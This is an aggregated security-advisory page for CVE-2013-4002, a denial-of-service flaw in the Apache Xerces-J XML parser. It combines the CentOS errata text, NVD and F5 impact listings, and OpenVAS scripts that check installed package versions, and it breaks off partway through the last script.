ID CESA-2014:1319 Type centos Reporter CentOS Project Modified 2014-09-30T10:59:34
Description
CentOS Errata and Security Advisory CESA-2014:1319
Apache Xerces for Java (Xerces-J) is a high performance, standards
compliant, validating XML parser written in Java. The xerces-j2 packages
provide Xerces-J version 2.
A resource consumption issue was found in the way Xerces-J handled XML
declarations. A remote attacker could use an XML document with a specially
crafted declaration using a long pseudo-attribute name that, when parsed by
an application using Xerces-J, would cause that application to use an
excessive amount of CPU. (CVE-2013-4002)
All xerces-j2 users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. Applications using the
Xerces-J must be restarted for this update to take effect.
Merged security bulletin from advisories:
http://lists.centos.org/pipermail/centos-announce/2014-September/020603.html
http://lists.centos.org/pipermail/centos-announce/2014-September/020605.html
{"cve": [{"lastseen": "2019-11-13T17:55:59", "bulletinFamily": "NVD", "description": "XMLscanner.java in Apache Xerces2 Java Parser before 2.12.0, as used in the Java Runtime Environment (JRE) in IBM Java 5.0 before 5.0 SR16-FP3, 6 before 6 SR14, 6.0.1 before 6.0.1 SR6, and 7 before 7 SR5 as well as Oracle Java SE 7u40 and earlier, Java SE 6u60 and earlier, Java SE 5.0u51 and earlier, JRockit R28.2.8 and earlier, JRockit R27.7.6 and earlier, Java SE Embedded 7u40 and earlier, and possibly other products allows remote attackers to cause a denial of service via vectors related to XML attribute names.", "modified": "2018-12-21T18:29:00", "id": "CVE-2013-4002", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-4002", "published": "2013-07-23T11:03:00", "title": "CVE-2013-4002", "type": "cve", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "f5": [{"lastseen": "2019-02-20T21:07:52", "bulletinFamily": "software", "description": "\nF5 Product Development has assigned ID 481806 (BIG-IP), ID 481806-1 (BIG-IQ), and ID 530276-1 (Enterprise Manager) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP AAM| 11.4.0 - 11.6.1| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP AFM| 11.3.0 - 11.6.1| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP Analytics| 11.0.0 - 11.6.1| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP APM| 11.0.0 - 11.6.1 \n10.1.0 - 10.2.4| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP ASM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP DNS| None| 12.0.0| Not vulnerable| None \nBIG-IP Edge Gateway| 11.0.0 - 11.3.0 \n10.1.0 - 10.2.4| None| Low| Xerces \nBIG-IP GTM| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP Link Controller| 11.0.0 - 11.6.1 \n10.0.0 - 10.2.4| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP PEM| 11.3.0 - 11.6.1| 12.0.0 \n11.6.1 HF1 \n11.5.4 HF2| Low| Xerces \nBIG-IP PSM| 11.0.0 - 11.4.1 \n10.0.0 - 10.2.4| None| Low| Xerces \nBIG-IP WebAccelerator| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Low| Xerces \nBIG-IP WOM| 11.0.0 - 11.3.0 \n10.0.0 - 10.2.4| None| Low| Xerces \nARX| None| 6.0.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| 3.0.0 - 3.1.1| None| Low| Xerces \nFirePass| None| 7.0.0 \n6.0.0 - 6.1.0| Not vulnerable| None \nBIG-IQ Cloud| 4.0.0 - 4.5.0| None| Low| Xerces \nBIG-IQ Device| 4.2.0 - 4.5.0| None| Low| Xerces \nBIG-IQ Security| 4.0.0 - 4.5.0| None| Low| Xerces \nBIG-IQ ADC| 4.5.0| None| Low| Xerces \nLineRate| None| 2.5.0 - 2.6.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| None| 4.0.0 - 4.4.0 \n3.3.2 - 3.5.1| Not vulnerable| None\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n * [K13123: Managing BIG-IP product hotfixes (11.x - 12.x)](<https://support.f5.com/csp/article/K13123>)\n", "modified": "2017-03-14T00:49:00", "published": "2015-07-08T05:10:00", "id": "F5:K16872", "href": "https://support.f5.com/csp/article/K16872", "title": "Java Runtime Environment vulnerability CVE-2013-4002", "type": "f5", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-07-25T17:02:11", "bulletinFamily": "software", "description": "Vulnerability Recommended Actions\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the listed version is older than the version you are currently running, or if the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n * SOL13123: Managing BIG-IP product hotfixes (11.x - 12.x)\n", "modified": "2016-07-25T00:00:00", "published": "2015-07-07T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/16000/800/sol16872.html", "id": "SOL16872", "title": "SOL16872 - Java Runtime Environment vulnerability CVE-2013-4002", "type": "f5", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:37:16", "bulletinFamily": "scanner", "description": "Amazon Linux Local Security Checks", "modified": "2018-10-01T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120345", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120345", "title": "Amazon Linux Local Check: ALAS-2014-436", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: alas-2014-436.nasl 6759 2017-07-19 09:56:33Z teissa$\n#\n# Amazon Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@iki.fi>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://ping-viini.org\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120345\");\n script_version(\"$Revision: 11703 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:24:16 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-01 10:05:31 +0200 (Mon, 01 Oct 2018) $\");\n script_name(\"Amazon Linux Local Check: ALAS-2014-436\");\n script_tag(name:\"insight\", value:\"A resource consumption issue was found in the way Xerces-J handled XML declarations. A remote attacker could use an XML document with a specially crafted declaration using a long pseudo-attribute name that, when parsed by an application using Xerces-J, would cause that application to use an excessive amount of CPU.\");\n script_tag(name:\"solution\", value:\"Run yum update xerces-j2 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2014-436.html\");\n script_cve_id(\"CVE-2013-4002\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Amazon Linux Local Security Checks\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"AMAZON\")\n{\nif ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-apis\", rpm:\"xerces-j2-javadoc-apis~2.7.1~12.7.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-xni\", rpm:\"xerces-j2-javadoc-xni~2.7.1~12.7.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-other\", rpm:\"xerces-j2-javadoc-other~2.7.1~12.7.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"xerces-j2-demo\", rpm:\"xerces-j2-demo~2.7.1~12.7.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.7.1~12.7.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"xerces-j2-scripts\", rpm:\"xerces-j2-scripts~2.7.1~12.7.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-impl\", rpm:\"xerces-j2-javadoc-impl~2.7.1~12.7.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.7.1~12.7.19.amzn1\", rls:\"AMAZON\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:31", "bulletinFamily": "scanner", "description": "Oracle Linux Local Security Checks ELSA-2014-1319", "modified": "2018-09-28T00:00:00", "published": "2015-10-06T00:00:00", "id": "OPENVAS:1361412562310123297", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123297", "title": "Oracle Linux Local Check: ELSA-2014-1319", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2014-1319.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123297\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:01:55 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2014-1319\");\n script_tag(name:\"insight\", value:\"ELSA-2014-1319 - xerces-j2 security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2014-1319\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2014-1319.html\");\n script_cve_id(\"CVE-2013-4002\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux(7|6)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux7\")\n{\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.11.0~17.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-j2-demo\", rpm:\"xerces-j2-demo~2.11.0~17.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc\", rpm:\"xerces-j2-javadoc~2.11.0~17.el7_0\", rls:\"OracleLinux7\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.7.1~12.7.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-j2-demo\", rpm:\"xerces-j2-demo~2.7.1~12.7.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-apis\", rpm:\"xerces-j2-javadoc-apis~2.7.1~12.7.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-impl\", rpm:\"xerces-j2-javadoc-impl~2.7.1~12.7.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-other\", rpm:\"xerces-j2-javadoc-other~2.7.1~12.7.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc-xni\", rpm:\"xerces-j2-javadoc-xni~2.7.1~12.7.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"xerces-j2-scripts\", rpm:\"xerces-j2-scripts~2.7.1~12.7.el6_5\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:11", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310868207", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868207", "title": "Fedora Update for xerces-j2 FEDORA-2014-10649", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xerces-j2 FEDORA-2014-10649\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868207\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:57:35 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2013-4002\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for xerces-j2 FEDORA-2014-10649\");\n script_tag(name:\"affected\", value:\"xerces-j2 on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-10649\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138577.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xerces-j2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.11.0~15.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:47", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310882043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882043", "title": "CentOS Update for xerces-j2 CESA-2014:1319 centos7", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for xerces-j2 CESA-2014:1319 centos7\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882043\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 17:00:27 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2013-4002\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"CentOS Update for xerces-j2 CESA-2014:1319 centos7\");\n script_tag(name:\"insight\", value:\"Apache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2 packages\nprovide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. Applications using the\nXerces-J must be restarted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"xerces-j2 on CentOS 7\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"CESA\", value:\"2014:1319\");\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2014-September/020605.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xerces-j2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS7\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS7\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.11.0~17.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-demo\", rpm:\"xerces-j2-demo~2.11.0~17.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xerces-j2-javadoc\", rpm:\"xerces-j2-javadoc~2.11.0~17.el7_0\", rls:\"CentOS7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:24", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310868205", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868205", "title": "Fedora Update for xerces-j2 FEDORA-2014-10626", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xerces-j2 FEDORA-2014-10626\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868205\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:58:46 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2013-4002\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for xerces-j2 FEDORA-2014-10626\");\n script_tag(name:\"affected\", value:\"xerces-j2 on Fedora 20\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-10626\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/138667.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'xerces-j2'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC20\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"xerces-j2\", rpm:\"xerces-j2~2.11.0~17.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:37:36", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-10-01T00:00:00", "id": "OPENVAS:1361412562310882045", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882045", "title": "CentOS Update for xerces-j2 CESA-2014:1319 centos6", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for xerces-j2 CESA-2014:1319 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.882045\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-01 16:59:53 +0530 (Wed, 01 Oct 2014)\");\n script_cve_id(\"CVE-2013-4002\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_name(\"CentOS Update for xerces-j2 CESA-2014:1319 centos6\");\n script_tag(name:\"insight\", value:\"Apache Xerces for Java (Xerces-J) is a high performance, standards\ncompliant, validating XML parser written in Java. The xerces-j2 packages\nprovide Xerces-J version 2.\n\nA resource consumption issue was found in the way Xerces-J handled XML\ndeclarations. A remote attacker could use an XML document with a specially\ncrafted declaration using a long pseudo-attribute name that, when parsed by\nan application using Xerces-J, would cause that application to use an\nexcessive amount of CPU. (CVE-2013-4002)\n\nAll xerces-j2 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. Applications using the\nXerces-J must be restarted for this update to take effect.\");\n script_tag(name:\"affected\", value:\"xerces-j2 on CentOS 6\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n 